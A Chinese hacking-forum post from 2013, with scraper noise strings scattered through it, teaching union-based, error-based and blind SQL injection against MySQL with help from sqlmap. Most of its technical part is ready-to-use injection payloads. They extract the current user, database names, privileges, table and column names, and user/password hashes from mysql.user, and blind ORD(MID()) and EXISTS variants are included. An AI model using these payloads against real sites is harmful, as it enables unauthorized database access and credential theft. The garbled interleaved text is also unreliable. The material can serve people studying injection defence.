放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
/ g9 Q j. U8 n' V/ o- Z2 z8 X
5 p$ H+ d$ e3 m2 T6 c这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表% X B2 F; g3 f; }( h8 d
5 ^$ Q* u* Z, \分类标准 分类 备注
# O |( Q, {$ w! L按字段类型 整型注入,字符型注入
9 R3 ?: H8 B( h! t7 P2 d按出现的位置 get注入,post注入,cookie注入,http header注入 3 S0 i, s9 |: H) }
然而高级注入是这样的8 S: l3 w9 l& o! a
; G6 ~# |1 }9 u t; K6 u9 L$ G高级注入分类 条件
2 l8 A) ~! Z1 v" t3 J$ a$ q. eerror-based sql 数据库的错误回显可以返回,存在数据库,表结构
2 X6 M* t3 r0 B2 w9 W$ R: i. z9 Zunion-based sql 能够使用union,存在数据库,表结构
- w+ }+ N/ j7 G% ?blind sql 存在注入
8 Y5 `3 ~3 u Z/ n t我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
9 j1 X0 r( m* N1 `$ o- ]3 F , Q, V" q& v3 S6 n+ A
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
* K: k' V$ [- |# w 7 [. P. ^3 W1 i! w' ~
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
, T) u: Q5 c, y ; _8 K" c' p& q" g, n( D
这里用mysql说明) H% \+ B- j- H& @$ T! t% _$ m& K
t8 h9 _6 y- H' ~
e注入坛子里很多了,请看戳我或者再戳我
# t7 C B- o) S3 S
; E6 D, [) a$ n% |( P* ou注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的7 N8 }& }. n, ]( O% ~' c
5 n0 f) d9 J1 `2 L7 a/ T- T% C
获取当前数据库用户名
3 A5 K" j" G c$ `# ? n! a2 v " S5 D" Y7 |. w; C' G4 `
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C; E2 }7 D" Q9 H9 S% M
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL: `) [0 X0 p) z1 ~1 W6 L+ \
L, NULL#
0 U2 L. R8 }5 H/ O% J& O |注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
6 g, l9 R1 x# D$ S2 v ' j5 b. u7 T9 X( |5 ?
获取数据库名
" M' `( [* Z4 ~: S
' H' H5 m2 ~: j+ r4 X1 _# YUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
0 J9 i: i+ C$ N' ]7 j9 {/ [% e获取所有用户名% T4 X1 |& P1 Y' v; S
+ P( _, L3 ~# P* S; U3 Y- NUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
6 W+ v. J/ l$ `+ m; l$ Z4 h查看当前用户权限 O3 j. n3 M- e8 L2 S" }! H
2 d: T0 b7 ~+ O9 bUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#; X# Y2 i* z$ _/ A @2 h: c
尝试获取密码,当然需要有能读mysql数据库的权限- A+ o" ^" |+ K0 X9 ^, G& B
, a7 N7 s* g! u+ e" rUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
3 r4 \( p8 I7 }" a& O4 [( Z% V获取表名,limit什么的自己搞啦0 U9 h0 i m% r! r6 G
5 D( ^+ v" C: Z8 ]4 Z( E4 vUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#- O/ t% i8 C/ E6 ^* J' q) \
获取字段名及其类型
5 @& f) E9 K4 T. U. b6 gUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
1 x0 Z. x" V: j, a/ d+ b4 X( B
. l5 i+ B8 o' s# ^9 p: ab注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
7 h, |2 m5 P F( \
1 B+ h. E N- Z( X( {4 a& u n5 c如:. V0 V" i9 e4 P4 b% Q5 x+ ^
获取当前用户名
& j$ p% }3 z1 j' \ 7 S) s% J# v7 d, q% V' C X+ K0 E
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1161 s- C& W/ R0 `4 o# I L9 Z
获取当前数据库
/ P9 U0 u4 J- W
, E/ v4 F+ K1 P+ K- R& ~, @AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106" U, I7 o2 v- @; r
获取表名; h a& N4 ~; W: m
7 }! s6 o) g& f f$ ~, I7 Y3 ?+ L
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
* U- ^, O, ?3 p获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
0 c3 U4 b" S9 U# R) T+ d! k回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。) X& H+ u8 r. a/ D5 S/ b
爆表1 t! J, I9 E/ P3 S
3 |; L8 b! Q; Q1 |: T' ^
AND EXISTS(select * from table)
. O, q& l2 }7 y2 Z* L m( j; J爆字段2 M! u1 X* e& k" w- P
/ P7 G* E V3 Z5 _( |AND EXISTS(select pwd from table)
! R+ U) R' ^5 e+ t5 o! U' f盲注的变化就比较多了,由于篇幅,只是举个例子而已。& e% M( W, E- z8 v+ y1 c
' i* y% w+ R1 S: R( R
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。' ]& O" u. H, c3 _$ ^- C
|
发表于 2013-7-16 20:31:26
收藏
支持
反对